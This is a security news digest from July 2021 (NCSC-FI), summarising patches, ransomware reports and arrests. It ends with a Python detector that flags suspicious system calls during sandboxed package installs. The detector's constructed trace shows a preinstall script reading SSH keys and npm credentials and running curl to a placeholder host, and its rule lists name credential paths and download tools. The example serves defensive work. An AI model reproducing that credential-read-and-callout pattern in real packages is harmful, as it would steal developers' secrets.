Daily NCSC-FI news followup 2021-07-26

iOS 14.7.1: Apple Issues Urgent iPhone Update With Important Security Fixes

www.forbes.com/sites/kateoflahertyuk/2021/07/26/ios-1471-apple-issues-urgent-iphone-update-with-important-security-fixes/ It's only been a week since Apple released iOS 14.7, which itself included critical security fixes, but did not address a vulnerability in iMessage that adversaries could have been taking advantage of to attack iPhones with the Pegasus spyware.

Researchers warn of unpatched Kaseya Unitrend backup vulnerabilities

www.bleepingcomputer.com/news/security/researchers-warn-of-unpatched-kaseya-unitrend-backup-vulnerabilities/ Last week, the Dutch Institute for Vulnerability Disclosure (DIVD) issued a TLP:AMBER advisory about three unpatched vulnerabilities in the Kaseya Unitrends backup product. While DIVD released this advisory under the TLP:AMBER designation, DIVD Chairman Victor Gevers told BleepingComputer that it was originally shared with 68 government CERTs under a coordinated disclosure. However, one of the recipients uploaded it to an online analyzing platform, where it became public to those with access to the service.

PlugwalkJoe Does the Perp Walk

krebsonsecurity.com/2021/07/plugwalkjoe-does-the-perp-walk/ [News coverage on the arrest of Joseph "PlugwalkJoe" O'Connor] overlooks sinister criminal charges in the indictment, which involve an underground scene wherein young men turn to extortion, sextortion, SIM swapping, death threats and physical attacks all in a frenzied effort to seize control over social media accounts. According to the indictment, a week after the Twitter hack a man identifying himself as O'Connor called federal investigators in Northern California. Specifically, the call went to the REACT Task Force. REACT is a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that is focused on catching criminal SIM swappers, and by this point REACT already had plenty of audio from phone calls traced back to O'Connor in which he allegedly participated in a SIM swapping or swatting attack.

No More Ransom saves almost 1 billion in ransomware payments in 5 years

www.bleepingcomputer.com/news/security/no-more-ransom-saves-almost-1-billion-in-ransomware-payments-in-5-years/ The No More Ransom project celebrates its fifth anniversary today after helping over six million ransomware victims recover their files and saving them almost 1 billion in ransomware payments.

2021 RANSOMWARE IMPACT REPORT

www.keeper.io/hubfs/2021_Ransomware_Impact_Report/2021_Ransomware_Impact_Report.pdf But what happens within an organization post-attack? How are internal processes affected? What's the impact on employee efficiency and productivity? To find out, Keeper surveyed 2,000 employees across the U.S. whose employers had suffered a ransomware attack in the previous 12 months. 49% of respondents told Keeper that their employers paid the ransom. However, this money didn't fall out of the sky: 93% reported that their employers tightened budgets in other areas following the ransom payment. 26% of respondents reported that their employers disclosed the attack only to partners and customers (not the general public), while 15% didn't tell anyone. This indicates that ransomware attacks are likely far more pervasive than anyone realizes.

Disrupting Ransomware by Disrupting Bitcoin

www.schneier.com/blog/archives/2021/07/disrupting-ransomware-by-disrupting-bitcoin.html We suggest an easier alternative: merely disrupt the cryptocurrency markets. Making them harder to use will have the effect of making them less useful as a ransomware payment vehicle, and not just because victims will have more difficulty figuring out how to pay. The reason requires understanding how criminals collect their profits.

Q2 Ransom Payment Amounts Decline as Ransomware becomes a National Security Priority

www.coveware.com/blog/2021/7/23/q2-ransom-payment-amounts-decline-as-ransomware-becomes-a-national-security-priority The average ransom payment declined to $136,576 while the median fell to $47,008, levels not seen since the beginning of 2021. The decrease was primarily driven by a growing number of disparate Ransomware-as-a-Service brands that have proliferated recently, and which have diluted the concentration of attacks controlled by just a few. [Interesting chart on the various degrees of state responsibility for cyber attacks: https://images.squarespace-cdn.com/content/v1/5ab16578e2ccd10898976178/1627049256926-84KBU1XKAFQ6HWRKRW0U/State+responsibility.png]

Estonian Citizen Pleads Guilty to Computer Fraud and Abuse

www.justice.gov/usao-ak/pr/estonian-citizen-pleads-guilty-computer-fraud-and-abuse According to court documents, Pavel Tsurkan, 33, operated a criminal proxy botnet by remotely accessing and compromising more than 1,000 computer devices and internet routers worldwide, including at least 60 victims in Alaska. He used the victims' devices to build and operate an Internet of Things (IoT)-based botnet dubbed the Russian2015 using the domain Russian2015.ru. Also: therecord.media/botnet-operator-who-proxied-traffic-for-other-cybercrime-groups-pleads-guilty/

Clubhouse denies data breach, experts debunk claims of leaked phone numbers

techzimo.com/clubhouse-denies-data-breach-experts-debunk-claims-of-leaked-phone-numbers/ On July 23, a hacker group claimed to have gained access to over 3.8 billion phone numbers from Clubhouse servers. The claim, posted on a hacker forum, states that the list of numbers contains cellphone, fixed, private, and professional numbers. The information about the claim was shared on Twitter by Jiten Jain, Director, Voyager Infosec. The social audio app has now denied the leak and, after examining the claims, several security experts have also said that these are false allegations against the company.

Even after Emotet takedown, Office docs deliver 43% of all malware downloads now

www.zdnet.com/article/even-after-emotet-takedown-office-docs-deliver-43-of-all-malware-downloads-now/ Malware delivered over the cloud increased by 68% in Q2, according to data from cybersecurity firm Netskope. Report at go.netskope.com/rs/665-KFP-612/images/2021-07-Cloud%20and%20Threat%20Report-RR-474-1.pdf

Meet Package Hunter: A tool for detecting malicious code in your dependencies

about.gitlab.com/blog/2021/07/23/announcing-package-hunter/ Package Hunter is a tool to analyze a program’s dependencies for malicious code and other unexpected behavior by installing the dependencies in a sandbox environment and monitoring system calls executed during the installation. Any suspicious system calls are reported to the user for further examination. It currently supports testing NodeJS modules and Ruby Gems.
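The approach described above (install in a sandbox, watch the system calls, report the suspicious ones) is easy to illustrate on a small scale. The following is an added example written for this digest, not Package Hunter's own code or rules: it parses constructed strace-style output from a sandboxed dependency install and flags three behaviours a reviewer would want to see before trusting a package: outbound connections to destinations other than an assumed registry address, reads of credential files, and execution of download utilities. The allowlisted address, the trace lines and the policy lists are all invented for the demonstration.

```python
import re
from typing import Dict, List

# Constructed sample: lines in the shape `strace -f` prints while a package
# manager installs dependencies inside a sandbox. Invented data, not a real trace.
SAMPLE_TRACE = """\
1201 execve("/usr/bin/node", ["node", "/usr/bin/npm", "install"], ...) = 0
1201 connect(12, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("104.16.16.35")}, 16) = 0
1201 openat(AT_FDCWD, "/work/node_modules/left-pad/package.json", O_RDONLY) = 14
1233 execve("/bin/sh", ["sh", "-c", "node preinstall.js"], ...) = 0
1234 openat(AT_FDCWD, "/home/build/.ssh/id_rsa", O_RDONLY) = 3
1234 openat(AT_FDCWD, "/home/build/.npmrc", O_RDONLY) = 4
1234 connect(5, {sa_family=AF_INET, sin_port=htons(8080), sin_addr=inet_addr("203.0.113.7")}, 16) = 0
1234 execve("/usr/bin/curl", ["curl", "-s", "http://203.0.113.7:8080/c"], ...) = 0
"""

# One trace line: "<pid> <syscall>(<args>) = <return>"
LINE_RE = re.compile(r'^(?P<pid>\d+)\s+(?P<call>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+)')
IP_RE = re.compile(r'inet_addr\("(?P<ip>[\d.]+)"\)')
PORT_RE = re.compile(r'htons\((?P<port>\d+)\)')
PATH_RE = re.compile(r'"(?P<path>[^"]+)"')

# Assumed sandbox policy (illustrative values, not Package Hunter's rule set).
ALLOWED_DESTINATIONS = {"104.16.16.35"}  # constructed stand-in for the package registry
SENSITIVE_PATH_PARTS = ("/.ssh/", "/.aws/", "/.npmrc", "/.gem/credentials")
DOWNLOADER_BINARIES = ("curl", "wget", "nc", "ncat")


def parse_trace(text: str) -> List[Dict[str, str]]:
    """Turn strace-style lines into dicts with pid, call, args and ret."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def analyze(records: List[Dict[str, str]], allowed=ALLOWED_DESTINATIONS) -> List[Dict[str, str]]:
    """Apply the policy to each syscall record and collect findings in trace order."""
    findings = []
    for r in records:
        pid, call, args = r["pid"], r["call"], r["args"]
        if call == "connect":
            ip, port = IP_RE.search(args), PORT_RE.search(args)
            if ip and ip.group("ip") not in allowed:
                dest = f"{ip.group('ip')}:{port.group('port') if port else '?'}"
                findings.append({"pid": pid, "rule": "unexpected_network", "detail": dest})
        elif call == "openat":
            p = PATH_RE.search(args)
            if p and any(part in p.group("path") for part in SENSITIVE_PATH_PARTS):
                findings.append({"pid": pid, "rule": "sensitive_file", "detail": p.group("path")})
        elif call == "execve":
            p = PATH_RE.search(args)
            # Lifecycle scripts legitimately spawn a shell, so only download
            # utilities are flagged here; the shell line stays visible in the trace.
            if p and p.group("path").rsplit("/", 1)[-1] in DOWNLOADER_BINARIES:
                findings.append({"pid": pid, "rule": "downloader_exec", "detail": p.group("path")})
    return findings


def report(text: str) -> List[Dict[str, str]]:
    """Parse and analyze a trace, returning the findings for further review."""
    return analyze(parse_trace(text))


if __name__ == "__main__":
    for f in report(SAMPLE_TRACE):
        print(f"pid {f['pid']}: {f['rule']:18} {f['detail']}")
```

A real run would feed this the trace of an install executed in a throwaway container with a network allowlist; the point of the sandbox is that a flagged finding costs nothing, because the install happened on a disposable host. The first `connect` to the allowlisted address is not reported, while the preinstall script's credential reads, its connection to an unlisted host and its `curl` execution each surface as a separate finding for the reviewer to examine.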
